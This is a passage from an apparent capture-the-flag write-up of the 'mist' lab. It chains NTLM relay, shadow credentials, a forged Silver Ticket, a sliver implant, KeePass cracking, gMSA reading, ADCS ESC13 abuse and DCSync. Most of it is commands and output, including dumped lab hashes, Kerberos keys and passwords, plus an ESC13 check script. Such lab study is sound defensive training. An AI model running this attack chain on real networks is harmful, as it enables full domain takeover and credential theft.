[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.101:445  ...  OK
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

The script announces success and there’s a hit on the ntlmrelayx indicating a new interactive session on port 11000. Accessing this port via nc drops me into a ldap shell where I can remove the previously set shadow credentials and setup new ones.

nc 127.0.0.1 11000
Type help for list of commands
 
# clear_shadow_creds ms01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
 
Shadow credentials cleared successfully!
 
# set_shadow_creds ms01$
Found Target DN: CN=MS01,CN=Computers,DC=mist,DC=htb
Target SID: S-1-5-21-1045809509-3006658589-2426055941-1108
 
KeyCredential generated with DeviceID: e9fe7459-d19d-0f81-2e27-de65b57d6c64
Shadow credentials successfully added!
Saved PFX (#PKCS12) certificate & key at path: c9cye1sx.pfx
Must be used with password: U381jXAD7tAyZbQou6AA

A new pfx is created in the directory where ntlmrelayx was started and a password is set for the file. With certipy-ad I first remove the password and then request a new TGT with the certificate to obtain the NTLM hash for MS01$.

certipy-ad cert -pfx c9cye1sx.pfx -password U381jXAD7tAyZbQou6AA -export -out ms01.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'ms01.pfx'
❯ proxychains -q certipy-ad auth -pfx ms01.pfx -u MS01$ -domain mist.htb -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:173b11122b127a2aa3cc0887bfc18644

With the hash of the machine account and the SID of the domain I can craft a Silver Ticket for Administrator get an shell and/or dump the credentials of the server. I’ll use ticketer from impacket to create the ticket.

proxychains -q nxc ldap \
                   dc01.mist.htb \
                   -u brandon.keywarp \
                   -H 'DB03D6A77A2205BC1D07082740626CC9' \
                   --get-sid
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
LDAP        192.168.100.100 389    DC01             [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9 
LDAP        192.168.100.100 389    DC01             Domain SID S-1-5-21-1045809509-3006658589-2426055941
 
impacket-ticketer -domain-sid S-1-5-21-1045809509-3006658589-2426055941 \
                  -domain MIST \
                  -spn HOST/MS01.mist.htb \
                  -nthash 173b11122b127a2aa3cc0887bfc18644 \
                  -user-id 500 \
                  Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Through secretsdump I dump the hashes from MS01$ and run the sliver payload in the context of the admin user.

export KRB5CCNAME=Administrator.ccache
 
proxychains -q impacket-wmiexec \
               -no-pass \
               -k \
               -silentcommand \
               Administrator@ms01.mist.htb \
               "C:\\xampp\\htdocs\\m.exe"
 
proxychains -q impacket-secretsdump -no-pass -k Administrator@ms01.mist.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:90f903787dd064cc1973c3aa4ca4a7c1:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39b46e16b48c8:::
[*] Dumping cached domain logon information (domain/username:hash)
MIST.HTB/Brandon.Keywarp:$DCC2$10240#Brandon.Keywarp#5f540c9ee8e4bfb80e3c732ff3e12b28: (2024-10-09 15:52:58)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MIST\MS01$:plain_password_hex:470c95fb11d5607f6420736b4fabc2f5a99022c3ed2ea0d20c364316b378b85b0efe1c23557742817e0f2091bd02a267b904e2829d029db0124ef07f6d71196bd3c76c44fdce75b257abd16cc8a9d67da6a8179c702e50f0843a5dfbd58956246a26dc02eb1a3e0b7d1ac963c9dbc0f7ec73340e7dd85e477c2a96f925ae09fbb4e209025f1b6bf97b50e7329a22ec04db9e92339dc557de641764884bd25d81b69eaba2f4f69f4328f3b39f2cae64185ca4eebf2d58d855f039d7c1e763b8f0e798b4bd452f7b355b621dc66c43334ba250ad712d10d484f8c99b2bf4fea0208197756a4d4fe4f1588c3d2c3b54c751
MIST\MS01$:aad3b435b51404eeaad3b435b51404ee:173b11122b127a2aa3cc0887bfc18644:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe464e18478cf4a7d809dfc9f5d6b5230ce98779b
dpapi_userkey:0x579d7a06798911d322fedc960313e93a71b43cc2
[*] NL$KM 
 0000   57 C8 F7 CD 24 F2 55 EB  19 1D 07 C2 15 84 21 B0   W...$.U.......!.
 0010   90 7C 79 3C D5 BE CF AC  EF 40 4F 8E 2A 76 3F 00   .|y<.....@O.*v?.
 0020   04 87 DF 47 CF D8 B7 AF  6D 5E EE 9F 16 5E 75 F3   ...G....m^...^u.
 0030   80 24 AA 24 B0 7D 3C 29  4F EA 4E 4A FB 26 4E 62   .$.$.}<)O.NJ.&Nb
NL$KM:57c8f7cd24f255eb191d07c2158421b0907c793cd5becfacef404f8e2a763f000487df47cfd8b7af6d5eee9f165e75f38024aa24b07d3c294fea4e4afb264e62
[*] _SC_ApacheHTTPServer 
svc_web:MostSavagePasswordEver123
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

On the desktop of the Administrator user I can find the first flag.

Shell as op_Sharon.Mullard (DC01)

Checking the other configured user on MS01, Sharon.Mullard, I quickly find a keepass file in her My Documents folder and two pictures in My Pictures. I’ll download all three files to my machine for further inspection.

sliver (mist) > ls 

C:\users\Sharon.Mullard\My Documents (4 items, 2.1 KiB)
=======================================================
Lrw-rw-rw-  My Music -> C:\Users\Sharon.Mullard\Music        0 B      Tue Feb 20 10:39:09 -0700 2024
Lrw-rw-rw-  My Pictures -> C:\Users\Sharon.Mullard\Pictures  0 B      Tue Feb 20 10:39:09 -0700 2024
Lrw-rw-rw-  My Videos -> C:\Users\Sharon.Mullard\Videos      0 B      Tue Feb 20 10:39:09 -0700 2024
-rw-rw-rw-  sharon.kdbx

sliver (mist) > ls

C:\users\Sharon.Mullard\My Documents\My Pictures (2 items, 1.2 MiB)
===================================================================
-rw-rw-rw-  cats.png            951.0 KiB  Wed Feb 21 08:41:24 -0700 2024
-rw-rw-rw-  image_20022024.png  254.4 KiB  Tue Feb 20 10:53:13 -0700 2024

The keepass database is password-protected, as expected but luckily the file image_20022024.png shows part the first 14 of the 15 characters: UA7cpa[#1!_*ZX. This means I just have to bruteforce a single character. I’ll extract the hash from the kdbx file with keepass2john and add the partial password to a file. Then I use hashcat to generate a wordlist by adding characters at the end through a hybrid attack⁴.

keepass2john sharon.kdbx > hash
 
hashcat -a6 password.txt '?a' --stdout > wordlist.txt
 
john --wordlist=wordlist.txt --fork=10 hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
UA7cpa[#1!_*ZX@  (sharon)

john finds the cleartext password UA7cpa[#1!_*ZX@ quickly since the wordlist only consists out of 95 entries. This allows me to open the database and look for other saved credentials. All I can find is a single entry named operative account with the password ImTiredOfThisJob:(, missing a username though and the password does not work for Sharon.Mullard.

Dumping all the users in the domain shows a likely candidate for the password - op_Sharon.Mullard - and trying to use the password with nxc returns success.

sliver (mist) > execute -o cmd /c net user /domain

[*] Output:
The request will be processed at a domain controller for domain mist.htb.


User accounts for \\DC01.mist.htb

-------------------------------------------------------------------------------
Administrator            Brandon.Keywarp          Florence.Brown
Guest                    Harry.Beaucorn           Jonathan.Clinton
krbtgt                   Markus.Roheb             op_Markus.Roheb
op_Sharon.Mullard        Sharon.Mullard           Shivangi.Sumpta
svc_cabackup             svc_smb
The command completed successfully.

I’ll run SharpHound through sliver next to get an overview over the domain and check what I can do with the users / credentials I have found so far. After downloading the ZIP and ingesting it into BloodHound its clear that the credentials allow me to connect to the Domain Controller via WinRM.

Shell as Administrator (DC01)

From the BloodHound graph I can see a connection from op_Sharon.Mullard to svc_ca$ with the ReadGMSAPassword edge and from there I can add a Shadow Credentials to access svc_cabackup. This account has enrollment rights on the ManagerAuthentication template.

If the policy attached to the certificate template has an OID Group Link the user enrolling with that template will be granted access as any member of that group would have. This is described in detail as ESC13⁵.

The current version of BloodHound (CE) does not show this edge yet, but there’s a Powershell script I can use to quickly check for this misconfiguration.

Check-ADCSESC13.ps1

<#
Prints OIDs and certificate templates that may be used in an ADCS ESC13 abuse
 
The script will check for:
1. OIDs with non-default ownership
2. OIDs with non-default ACE
3. OIDs linked to a group
4. Certificate templates configured with OID linked to a group
#>
 
Import-Module ActiveDirectory
 
# Get OIDs and certificate templates with msPKI-Certificate-Policy
$ADRootDSE = Get-ADRootDSE
$ConfigurationNC = $ADRootDSE.configurationNamingContext
$OIDContainer = "CN=OID,CN=Public Key Services,CN=Services,$ConfigurationNC"
$TemplateContainer = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$ConfigurationNC"
$OIDs = Get-ADObject -Filter * -SearchBase $OIDContainer -Properties DisplayName,Name,msPKI-Cert-Template-OID,msDS-OIDToGroupLink,nTSecurityDescriptor
$Templates = Get-ADObject -Filter * -SearchBase $TemplateContainer -Properties msPKI-Certificate-Policy | ? {$_."msPKI-Certificate-Policy"} | select name,msPKI-Certificate-Policy
 
if ($OIDs) {
 
    Write-Host "Enumerating OIDs"
    Write-Host "------------------------"
 
    # Iterate through each OID
    foreach ($OID in $OIDs) {
 
        if ($OID."msDS-OIDToGroupLink") {
            Write-Host "OID $($OID.Name) links to group: $($OID."msDS-OIDToGroupLink")`r`n"
            Write-Host "OID DisplayName: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "OID DistinguishedName: $($OID."DistinguishedName")"
            Write-Host "OID msPKI-Cert-Template-OID: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "OID msDS-OIDToGroupLink: $($OID."msDS-OIDToGroupLink")"
            Write-Host "------------------------"
        }
 
        if ($OID.nTSecurityDescriptor.Owner -notlike "*\Enterprise Admins") {
            Write-Host "OID $($OID.Name) has non-default owner: $($OID.nTSecurityDescriptor.Owner)`r`n"
            Write-Host "OID DisplayName: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "OID DistinguishedName: $($OID."DistinguishedName")"
            Write-Host "OID msPKI-Cert-Template-OID: $($OID."msPKI-Cert-Template-OID")"
            Write-Host "------------------------"        
        }
 
        $ACEs = $OID.nTSecurityDescriptor.Access
        foreach ($ACE in $ACEs) {
            if ($ACE.IdentityReference -like "*\Domain Admins" -or $ACE.IdentityReference -like "*\Enterprise Admins" -or $ACE.IdentityReference -like "*\SYSTEM") {
                continue
            } elseif ($ACE.IdentityReference -like "*\Authenticated Users" -and $ACE.ActiveDirectoryRights -eq "GenericRead") {
                continue
            } else {
                Write-Host "OID $($OID.Name) has non-default ACE:"
                Write-Output $ACE
                Write-Host "OID DisplayName: $($OID."msPKI-Cert-Template-OID")"
                Write-Host "OID DistinguishedName: $($OID."DistinguishedName")"
                Write-Host "OID msPKI-Cert-Template-OID: $($OID."msPKI-Cert-Template-OID")"
                Write-Host "------------------------"        
            }
        }
    }
 
    Write-Host "Enumerating certificate templates"
    Write-Host "------------------------"
 
    # Iterate through each template
    foreach ($Template in $Templates) {
 
        # Check if the Template OID matches any OID in the list
        $MatchingOID = $OIDs | ? { $_."msDS-OIDToGroupLink" -and $Template."msPKI-Certificate-Policy" -contains $_."msPKI-Cert-Template-OID" }
 
        if ($MatchingOID) {
            Write-Host "Certificate template $($Template.Name) may be used to obtain membership of $($MatchingOID."msDS-OIDToGroupLink")`r`n"
            Write-Host "Certificate template Name: $($Template.Name)"
            Write-Host "OID DisplayName: $($MatchingOID."msPKI-Cert-Template-OID")"
            Write-Host "OID DistinguishedName: $($MatchingOID."DistinguishedName")"
            Write-Host "OID msPKI-Cert-Template-OID: $($MatchingOID."msPKI-Cert-Template-OID")"
            Write-Host "OID msDS-OIDToGroupLink: $($MatchingOID."msDS-OIDToGroupLink")"
            Write-Host "------------------------"
        }
    }
    Write-Host "Done"
} else {
    Write-Host "Error: No OIDs were found."
}

After running this script with any of the sessions I have, it shows enrollment with the ManagerAuthentication template will grant access to the Certificate Managers group. This group is part of CA Backup, can therefore enroll with the template BackupSvcAuthentication and can act as a member of the Service Accounts, belonging to the Backup Operator group allowing me to dump the credentials of the domain.

.\Check-ADCSESC13.ps1
Enumerating OIDs
------------------------
OID 14514029.01A0D91BA39F2716F6917FF97B18C130 links to group: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
 
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
OID 979197.E044723721C6681BECDB4DDD43B151CC links to group: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
 
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Enumerating certificate templates
------------------------
Certificate template ManagerAuthentication may be used to obtain membership of CN=Certificate Managers,CN=Users,DC=mist,DC=htb
 
Certificate template Name: ManagerAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
Certificate template BackupSvcAuthentication may be used to obtain membership of CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
 
Certificate template Name: BackupSvcAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Done

Now that the path forward is mapped, I start with the extraction of the NTLM hash for svc_ca$ via nxc and retrieve e218b0c599d694b2c722b23d5b1152d5.

proxychains -q nxc ldap \
                   dc01.mist.htb \
                   -u 'OP_SHARON.MULLARD' \
                   -p 'ImTiredOfThisJob:(' \
                   --gmsa
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
LDAPS       192.168.100.100 636    DC01             [+] mist.htb\OP_SHARON.MULLARD:ImTiredOfThisJob:( 
LDAPS       192.168.100.100 636    DC01             [*] Getting GMSA Passwords
LDAPS       192.168.100.100 636    DC01             Account: svc_ca$              NTLM: e218b0c599d694b2c722b23d5b1152d5

Instead of using ntlmrelayx (or the ldap shell) to set Shadow Credentials, I’ll use the previously shown pywhisker to add the credential link to svc_cabackup.

proxychains -q python3 pywhisker.py \
                       -u 'svc_ca$' \
                       -H :e218b0c599d694b2c722b23d5b1152d5 \
                       -d mist \
                       --dc-ip 192.168.100.100 \
                       --target \
                       'svc_cabackup' \
                       --action "add"
[*] Searching for the target account
[*] Target user found: CN=svc_cabackup,CN=Users,DC=mist,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: f0bb0a14-4a4e-31c2-b82c-c9d7dae4fffd
[*] Updating the msDS-KeyCredentialLink attribute of svc_cabackup
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: 4pPS5jED.pfx
[*] Must be used with password: E3VwHXpUvLCEOUtUIC1K
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

With the help of certipy-ad I remove the password from the pfx, use it to authenticate and retrieve the NTLM hash for svc_cabackup: c9872f1bc10bdd522c12fc2ac9041b64

certipy-ad cert \
           -pfx 4pPS5jED.pfx  \
           -password E3VwHXpUvLCEOUtUIC1K \
           -export \
           -out svc_cabackup.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Writing PFX to 'svc_cabackup.pfx'
 
proxychains -q certipy-ad auth \
                          -pfx svc_cabackup.pfx \
                          -u svc_cabackup \
                          -domain mist.htb \
                          -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[!] Could not find identification in the provided certificate
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

The previous command created a credential cache file with the TGT as svc_cabackup.ccache and I’ll export this as environment variable KRB5CCNAME so that it will be used for authentication during the next requests.

Then I proceed with the enrollment through the ManagerAuthentication template that generates another certificate (pfx) that can be used to authenticate.

export KRB5CCNAME=svc_cabackup.ccache
 
proxychains -q certipy-ad req \
                          -k \
                          -no-pass \
                          -target dc01.mist.htb \
                          -dc-ip 192.168.100.100 \
                          -ns 192.168.100.100 \
                          -dns-tcp \
                          -template 'ManagerAuthentication' \
                          -ca 'mist-DC01-CA' \
                          -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 65
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

Using the certificate to authenticate updates the credential cache and should grant me access as member of the Certificate Managers group.

proxychains -q certipy-ad auth \
                          -pfx svc_cabackup.pfx \
                          -u svc_cabackup \
                          -domain mist.htb \
                          -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Next I’ll request another certificate, this time with the template BackupSvcAuthentication. Since that returns another cert it also confirms that the OID Group Link works.

proxychains -q certipy-ad req \
                          -k \
                          -no-pass \
                          -target dc01.mist.htb \
                          -dc-ip 192.168.100.100 \
                          -ns 192.168.100.100 \
                          -dns-tcp \
                          -template 'BackupSvcAuthentication' \
                          -ca 'mist-DC01-CA' \
                          -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 67
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

Once again I repeat the previous steps to authenticate with the new certificate and should now be part of the Backup Operators group. To test my new privileges I dump the registry hives SAM, SYSTEM and SECURITY to a local folder on the Domain Controller.

proxychains -q certipy-ad auth \
                          -pfx svc_cabackup.pfx \
                          -u svc_cabackup \
                          -domain mist.htb \
                          -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
 
proxychains -q impacket-reg -k \
                            -no-pass \
                            -target-ip 192.168.100.100 \
                            dc01 \
                            backup \
                            -o '\\dc01\c$\temp'
 
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\dc01\c$\temp\SAM.save
[*] Saved HKLM\SYSTEM to \\dc01\c$\temp\SYSTEM.save
[*] Saved HKLM\SECURITY to \\dc01\c$\temp\SECURITY.save

Through the interactive session via evil-winrm with the credentials of op_Sharon.Mullard I download the dumped files to my machine in order to run secretsdump.

impacket-secretsdump -sam SAM.save \
                     -system SYSTEM.save \
                     -security SECURITY.save local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x47c7c97d3b39b2a20477a77d25153da5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e121bd371bd4bbaca21175947013dd7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:c68cb851aa6312ad86b532db8103025cb80e69025bd381860316ba55b056b9e1248e7817ab7fc5b23c232a5bd2aa5b8515041dc3dc47fa4e2d4c34c7db403c7edc4418cf22a1b8c2c544c464ec9fedefb1dcdbebff68c6e9a103f67f3032b68e7770b4e8e22ef05b29d002cc0e22ad4873a11ce9bac40785dcc566d38bb3e2f0d825d2f4011b566ccefdc55f098c3b76affb9a73c6212f69002655dd7b774673bf8eecaccd517e9550d88e33677ceba96f4bc273e4999bbd518673343c0a15804c43fde897c9bd579830258b630897e79d93d0c22edc2f933c7ec22c49514a2edabd5d546346ce55a0833fc2d8403780
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc78bf46f3d899c3922815140240178912cb2eb59
dpapi_userkey:0xc62a01b328674180712ffa554dd33d468d3ad7b8
[*] NL$KM 
 0000   C4 C5 BF 4E A9 98 BD 1B  77 0E 76 A1 D3 09 4C AB   ...N....w.v...L.
 0010   B6 95 C7 55 E8 5E 4C 48  55 90 C0 26 19 85 D4 C2   ...U.^LHU..&....
 0020   67 D7 76 64 01 C8 61 B8  ED D6 D1 AF 17 5E 3D FC   g.vd..a......^=.
 0030   13 E5 4D 46 07 5F 2B 67  D3 53 B7 6F E6 B6 27 31   ..MF._+g.S.o..'1
NL$KM:c4c5bf4ea998bd1b770e76a1d3094cabb695c755e85e4c485590c0261985d4c267d7766401c861b8edd6d1af175e3dfc13e54d46075f2b67d353b76fe6b62731
[*] Cleaning up...

By default the machine account of a Domain Controller has DCSync privileges and can be used to dump all the hashes in the domain.

❯ proxychains -q impacket-secretsdump  -target-ip 192.168.100.100 \
                                       -hashes :e768c4cf883a87ba9e96278990292260 \
                                       'DC01$@dc01'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:298fe98ac9ccf7bd9e91a69b8c02e86f:::
Sharon.Mullard:1109:aad3b435b51404eeaad3b435b51404ee:1f806175e243ed95db55c7f65edbe0a0:::
Brandon.Keywarp:1110:aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9:::
Florence.Brown:1111:aad3b435b51404eeaad3b435b51404ee:9ee69a8347d91465627365c41214edd6:::
Jonathan.Clinton:1112:aad3b435b51404eeaad3b435b51404ee:165fbae679924fc539385923aa16e26b:::
Markus.Roheb:1113:aad3b435b51404eeaad3b435b51404ee:74f1d3e2e40af8e3c2837ba96cc9313f:::
Shivangi.Sumpta:1114:aad3b435b51404eeaad3b435b51404ee:4847f5daf1f995f14c262a1afce61230:::
Harry.Beaucorn:1115:aad3b435b51404eeaad3b435b51404ee:a3188ac61d66708a2bd798fa4acca959:::
op_Sharon.Mullard:1122:aad3b435b51404eeaad3b435b51404ee:d25863965a29b64af7959c3d19588dd7:::
op_Markus.Roheb:1123:aad3b435b51404eeaad3b435b51404ee:73e3be0e5508d1ffc3eb57d48b7b8a92:::
svc_smb:1125:aad3b435b51404eeaad3b435b51404ee:1921d81fdbc829e0a176cb4891467185:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260:::
MS01$:1108:aad3b435b51404eeaad3b435b51404ee:173b11122b127a2aa3cc0887bfc18644:::
svc_ca$:1124:aad3b435b51404eeaad3b435b51404ee:e218b0c599d694b2c722b23d5b1152d5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:223c1b3a34e024798181df5812ff08617c8a874473002ca892f5f3312a0367d2
Administrator:aes128-cts-hmac-sha1-96:98610a32239f909d2dd7191a0b200af3
Administrator:des-cbc-md5:89e007fbc8197319
krbtgt:aes256-cts-hmac-sha1-96:1f8d633a6aca948f3cfe1ae103ef2245825dc2f16ed171823ac817c097aea0f1
krbtgt:aes128-cts-hmac-sha1-96:d746342824512200d29d504b040e150b
krbtgt:des-cbc-md5:4923193b1c981332
Sharon.Mullard:aes256-cts-hmac-sha1-96:46f1b3a696d5ce7194654e1ee205e05e5fc40fc6726232494d50172697404f59
Sharon.Mullard:aes128-cts-hmac-sha1-96:ce1d4f67122df39096a0304087a37af9
Sharon.Mullard:des-cbc-md5:1a7f4054163d7580
Brandon.Keywarp:aes256-cts-hmac-sha1-96:5b6d15db9b7d5a87e6fab031a46dc560df979523edf72109a33dbee4c9023e2a
Brandon.Keywarp:aes128-cts-hmac-sha1-96:c94f80b1f0f52971bc210cb7fa08e548
Brandon.Keywarp:des-cbc-md5:80757608c7fef2ec
Florence.Brown:aes256-cts-hmac-sha1-96:30edaa3ce504213f32a4ea4b4ee209788bc022d2702f45e512b8d552b530d9f3
Florence.Brown:aes128-cts-hmac-sha1-96:68085dd2a95d4ead421af52312472061
Florence.Brown:des-cbc-md5:ce7508bc0e7998ab
Jonathan.Clinton:aes256-cts-hmac-sha1-96:ac2f7bfaee93c245ebbd9959fa420c32b1d69780560c8a23c605eb47e5d6cc46
Jonathan.Clinton:aes128-cts-hmac-sha1-96:467238a4a231a28930e412d27ed8b09a
Jonathan.Clinton:des-cbc-md5:087c674fcdf1bf8f
Markus.Roheb:aes256-cts-hmac-sha1-96:48553e83896443f93aa77b0f280407f02d0a13da45c2c39598fb0fa298c17043
Markus.Roheb:aes128-cts-hmac-sha1-96:e48c992fe7678056ac85e0fe169c02c5
Markus.Roheb:des-cbc-md5:7940c4c8259b1af7
Shivangi.Sumpta:aes256-cts-hmac-sha1-96:4b6f0e6c634bdc4dad3b91b42fec80135c5520f49aa7f7d541d27aacfce21d89
Shivangi.Sumpta:aes128-cts-hmac-sha1-96:25fba62098625aecfe9f335aa71a01cb
Shivangi.Sumpta:des-cbc-md5:c24fa21ccb91aba1
